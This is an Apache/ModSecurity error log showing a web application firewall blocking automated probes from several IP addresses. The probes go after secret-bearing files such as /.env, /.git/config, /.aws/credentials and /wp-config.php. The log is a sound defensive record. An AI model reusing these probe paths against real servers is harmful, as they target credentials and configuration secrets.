[Mon Nov 10 13:48:45.283322 2025] [:error] [pid 4146479] [client 138.68.82.23:35178] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHfLVLv7wBhdUY6uO0c8AAAAAA"]
[Mon Nov 10 14:45:17.041317 2025] [authz_core:error] [pid 4149028] [client 165.22.34.189:41890] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 10 14:45:18.040118 2025] [:error] [pid 4146498] [client 165.22.34.189:41928] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRHsbn9BDuFoT-Me1hI_4QAAAAc"]
[Mon Nov 10 14:45:18.040366 2025] [:error] [pid 4146498] [client 165.22.34.189:41928] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRHsbn9BDuFoT-Me1hI_4QAAAAc"]
[Mon Nov 10 14:45:18.040540 2025] [:error] [pid 4146498] [client 165.22.34.189:41928] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRHsbn9BDuFoT-Me1hI_4QAAAAc"]
[Mon Nov 10 14:45:18.346600 2025] [:error] [pid 4146482] [client 165.22.34.189:41934] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRHsbgrhGfuuFKhoNpx_jAAAAAM"]
[Mon Nov 10 14:45:18.346867 2025] [:error] [pid 4146482] [client 165.22.34.189:41934] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRHsbgrhGfuuFKhoNpx_jAAAAAM"]
[Mon Nov 10 14:45:18.347079 2025] [:error] [pid 4146482] [client 165.22.34.189:41934] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRHsbgrhGfuuFKhoNpx_jAAAAAM"]
[Mon Nov 10 14:45:18.639377 2025] [:error] [pid 4146497] [client 165.22.34.189:41950] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRHsbmk_ZOxM2RQC8XBiaAAAAAY"]
[Mon Nov 10 14:45:18.639584 2025] [:error] [pid 4146497] [client 165.22.34.189:41950] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRHsbmk_ZOxM2RQC8XBiaAAAAAY"]
[Mon Nov 10 14:45:18.639746 2025] [:error] [pid 4146497] [client 165.22.34.189:41950] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRHsbmk_ZOxM2RQC8XBiaAAAAAY"]
[Mon Nov 10 18:46:25.852054 2025] [authz_core:error] [pid 4157452] [client 178.128.207.138:52652] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 10 18:46:27.972565 2025] [:error] [pid 4160387] [client 178.128.207.138:52692] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRIk85gG_ofj0zHpbynTlAAAAAU"]
[Mon Nov 10 18:46:27.972785 2025] [:error] [pid 4160387] [client 178.128.207.138:52692] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRIk85gG_ofj0zHpbynTlAAAAAU"]
[Mon Nov 10 18:46:27.972963 2025] [:error] [pid 4160387] [client 178.128.207.138:52692] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRIk85gG_ofj0zHpbynTlAAAAAU"]
[Mon Nov 10 18:46:28.662493 2025] [:error] [pid 4160389] [client 178.128.207.138:52700] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRIk9No79vn1a0Z-GRb1DQAAAAw"]
[Mon Nov 10 18:46:28.662696 2025] [:error] [pid 4160389] [client 178.128.207.138:52700] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRIk9No79vn1a0Z-GRb1DQAAAAw"]
[Mon Nov 10 18:46:28.662849 2025] [:error] [pid 4160389] [client 178.128.207.138:52700] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRIk9No79vn1a0Z-GRb1DQAAAAw"]
[Mon Nov 10 18:46:28.949858 2025] [:error] [pid 4146482] [client 178.128.207.138:52716] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRIk9ArhGfuuFKhoNpx_uQAAAAM"]
[Mon Nov 10 18:46:28.950083 2025] [:error] [pid 4146482] [client 178.128.207.138:52716] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRIk9ArhGfuuFKhoNpx_uQAAAAM"]
[Mon Nov 10 18:46:28.950270 2025] [:error] [pid 4146482] [client 178.128.207.138:52716] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRIk9ArhGfuuFKhoNpx_uQAAAAM"]
[Tue Nov 11 00:45:41.904553 2025] [:error] [pid 4167355] [client 4.235.113.31:41006] [client 4.235.113.31] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRJ5Jb2UBqlgGwAdUoUlCAAAAAs"]
[Tue Nov 11 00:45:41.904818 2025] [:error] [pid 4167355] [client 4.235.113.31:41006] [client 4.235.113.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRJ5Jb2UBqlgGwAdUoUlCAAAAAs"]
[Tue Nov 11 00:45:41.904981 2025] [:error] [pid 4167355] [client 4.235.113.31:41006] [client 4.235.113.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRJ5Jb2UBqlgGwAdUoUlCAAAAAs"]
[Tue Nov 11 13:02:04.887420 2025] [:error] [pid 4181257] [client 62.60.131.162:56143] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRMlvEz_BhpXoU7WlveBRgAAAAg"]
[Tue Nov 11 13:02:04.887631 2025] [:error] [pid 4181257] [client 62.60.131.162:56143] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRMlvEz_BhpXoU7WlveBRgAAAAg"]
[Tue Nov 11 13:02:04.887808 2025] [:error] [pid 4181257] [client 62.60.131.162:56143] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRMlvEz_BhpXoU7WlveBRgAAAAg"]
[Tue Nov 11 13:02:04.941378 2025] [authz_core:error] [pid 4171506] [client 62.60.131.162:57707] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Tue Nov 11 13:02:05.103336 2025] [:error] [pid 4182190] [client 62.60.131.162:56929] [client 62.60.131.162] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aRMlvVbh6lf82qxmO8oI_gAAAAo"]
[Tue Nov 11 13:02:05.103551 2025] [:error] [pid 4182190] [client 62.60.131.162:56929] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aRMlvVbh6lf82qxmO8oI_gAAAAo"]
[Tue Nov 11 13:02:05.103731 2025] [:error] [pid 4182190] [client 62.60.131.162:56929] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aRMlvVbh6lf82qxmO8oI_gAAAAo"]
[Tue Nov 11 13:02:05.126988 2025] [:error] [pid 4182225] [client 62.60.131.162:57290] [client 62.60.131.162] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aRMlvZBAYZy5YS2tcjmeLgAAABU"]
[Tue Nov 11 13:02:05.127199 2025] [:error] [pid 4182225] [client 62.60.131.162:57290] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aRMlvZBAYZy5YS2tcjmeLgAAABU"]
[Tue Nov 11 13:02:05.127363 2025] [:error] [pid 4182225] [client 62.60.131.162:57290] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aRMlvZBAYZy5YS2tcjmeLgAAABU"]
[Tue Nov 11 13:02:05.238449 2025] [:error] [pid 4182230] [client 62.60.131.162:56680] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aRMlvVS48pW0--wPpblykwAAABo"]
[Tue Nov 11 13:02:05.238586 2025] [:error] [pid 4182230] [client 62.60.131.162:56680] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aRMlvVS48pW0--wPpblykwAAABo"]
[Tue Nov 11 13:02:05.238782 2025] [:error] [pid 4182230] [client 62.60.131.162:56680] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aRMlvVS48pW0--wPpblykwAAABo"]
[Tue Nov 11 13:02:05.238948 2025] [:error] [pid 4182230] [client 62.60.131.162:56680] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aRMlvVS48pW0--wPpblykwAAABo"]
[Tue Nov 11 13:02:05.479132 2025] [:error] [pid 4182250] [client 62.60.131.162:57327] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRMlvVzXsBLvTPLheVaD9wAAAAY"]
[Tue Nov 11 13:02:05.479408 2025] [:error] [pid 4182250] [client 62.60.131.162:57327] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRMlvVzXsBLvTPLheVaD9wAAAAY"]
[Tue Nov 11 13:02:05.479605 2025] [:error] [pid 4182250] [client 62.60.131.162:57327] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRMlvVzXsBLvTPLheVaD9wAAAAY"]
